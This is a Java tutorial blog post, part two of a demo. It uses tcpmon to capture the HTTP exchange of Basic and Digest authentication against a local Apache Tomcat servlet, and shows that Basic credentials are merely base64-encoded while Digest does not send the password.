[Demo] Basic and Digest Authentication using Apache Tomcat server Part 2 - Looking into the transmitted password data from client to server

This is the second part of the demo on Basic and Digest Authentication using Apache Tomcat server. We have already created the setup, did necessary configurations within web.xml and tomcat’s tomcat-users.xml, and finally exported it as a war, deployed it into tomcat and tested the basic and digest authentication. Here we will use a protocol analyzer to see and analyze the actual requests and responses send between client and server during basic and digest authentication in apache tomcat.

 

Tools required

We will use tcpmon to listen to requests and responses as it is very simple and just fits our need. You can read more about it @ http://javajee.com/using-tcpmon-to-listen-to-http-requests-and-responses. You may also use wireshark which is a tool with many advanced capabilities. You can start reading about wireshark @ http://javajee.com/introduction-to-wireshark-%E2%80%93-basic-concept-installation-and-first-data-capture.

 

Configuring Tcpmon

In the first part, we had created the setup, did necessary configurations within web.xml and tomcat’s tomcat-users.xml, and finally exported it as a war, deployed it into tomcat. The url for the RestrictedServlet is http://localhost:8080/ServletSecurity/RestrictedServlet

Open tcpmon by clicking tcpmon.bat (in Windows) and enter the Listen Port # as 9090 and Target Port # as 8080 (same as in your current url), leaving the host as 127.0.0.1 (assuming you are executing on your localhost with above url), and click add.

Now a new tab will appear where you can monitor every communication sent to localhost:9090. You will now need to use a modified url with port as 9090 and tcpmon will forward it to the port 8080 along with capturing the details.

 

BASIC authentication

Run the modified url for RestrictedServlet with port as 9090 instead of 8080: http://localhost:9090/ServletSecurity/RestrictedServlet.

The client will send a GET request and server will send back a HTTP/1.1 401 Unauthorized response mentioning the authentication scheme as  BASIC and also the Realm name.

Now the client browser will show you a popup to capture the username and password.

 

Once you enter the right username and password with correct role (admin/tomcat), then you will get the response from the servlet.

If you look at the tcpmon listen page, you can see the details sent by client and response by the server.

I can see that the authentication scheme is BASIC and username and password sent (encrypted using base 64) as YWRtaW46dG9tY2F0.

I can simply go to any base 64 decoder (e.g. https://www.base64decode.org/), give the encrypted string  YWRtaW46dG9tY2F0 and decode with a single click and it will give me the username and password as: admin:tomcat.

 

DIGEST authentication

To change the authentication type from BASIC to DIGEST,

  1. Go to your deployed we application’s web.xml file (e.g. <TOMCAT-INSTALL-DIR>/webapps/ServletSecurity/WEB-INF/web.xml)  

  2. Change   <auth-method>BASIC</auth-method> to   <auth-method>DIGEST</auth-method>

  3. Stop (shutdown.bat) and start (startup.bat) tomcat

 

Now close and open a new browser window (to get a new session) and execute the same url as before: http://localhost:9090/ServletSecurity/RestrictedServlet.

This will give you a popup as before asking for your credentials.

If you look at tcpmon for the request and response, you can see that the authentication method is now DIGEST instead of BASIC.

The WWW-Authenticate header will now contain some additional information as well, which is required by client for creating the digest.

WWW-Authenticate: Digest realm="Restricted Access", qop="auth", nonce="1429331633971:fe2a4023146da72712a100913629c721", opaque="4FE4AED73CC7D1995AF7BC84E2EB9303"

 

Once you enter the right username and password with correct role (admin/tomcat), then you will get the response from the servlet (same as with BASIC authentication).

 

However if you look at tcpmon, you can see that the password is now not sent as in the case of BASIC before, but username is sent as is without any encryption.

Authorization header will now have value as:

Authorization: Digest username="admin", realm="Restricted Access", nonce="1429331633971:fe2a4023146da72712a100913629c721", uri="/ServletSecurity/RestrictedServlet", response="b86430e9b4d5e4c1f0abf64b566c715c", opaque="4FE4AED73CC7D1995AF7BC84E2EB9303", qop=auth, nc=00000001, cnonce="d5205f3c7acc1ecd"

 

Now you will not be able to generate the password as we did before.

Tags: 

Quick Notes Finder Tags

Activities (1) advanced java (1) agile (3) App Servers (6) archived notes (2) Arrays (1) Best Practices (12) Best Practices (Design) (3) Best Practices (Java) (7) Best Practices (Java EE) (1) BigData (3) Chars & Encodings (6) coding problems (2) Collections (15) contests (3) Core Java (All) (55) course plan (2) Database (12) Design patterns (8) dev tools (3) downloads (2) eclipse (9) Essentials (1) examples (14) Exception (1) Exceptions (4) Exercise (1) exercises (6) Getting Started (18) Groovy (2) hadoop (4) hibernate (77) hibernate interview questions (6) History (1) Hot book (5) http monitoring (2) Inheritance (4) intellij (1) java 8 notes (4) Java 9 (1) Java Concepts (7) Java Core (9) java ee exercises (1) java ee interview questions (2) Java Elements (16) Java Environment (1) Java Features (4) java interview points (4) java interview questions (4) javajee initiatives (1) javajee thoughts (3) Java Performance (6) Java Programmer 1 (11) Java Programmer 2 (7) Javascript Frameworks (1) Java SE Professional (1) JPA 1 - Module (6) JPA 1 - Modules (1) JSP (1) Legacy Java (1) linked list (3) maven (1) Multithreading (16) NFR (1) No SQL (1) Object Oriented (9) OCPJP (4) OCPWCD (1) OOAD (3) Operators (4) Overloading (2) Overriding (2) Overviews (1) policies (1) programming (1) Quartz Scheduler (1) Quizzes (17) RabbitMQ (1) references (2) restful web service (3) Searching (1) security (10) Servlets (8) Servlets and JSP (31) Site Usage Guidelines (1) Sorting (1) source code management (1) spring (4) spring boot (3) Spring Examples (1) Spring Features (1) spring jpa (1) Stack (1) Streams & IO (3) Strings (11) SW Developer Tools (2) testing (1) troubleshooting (1) user interface (1) vxml (8) web services (1) Web Technologies (1) Web Technology Books (1) youtube (1)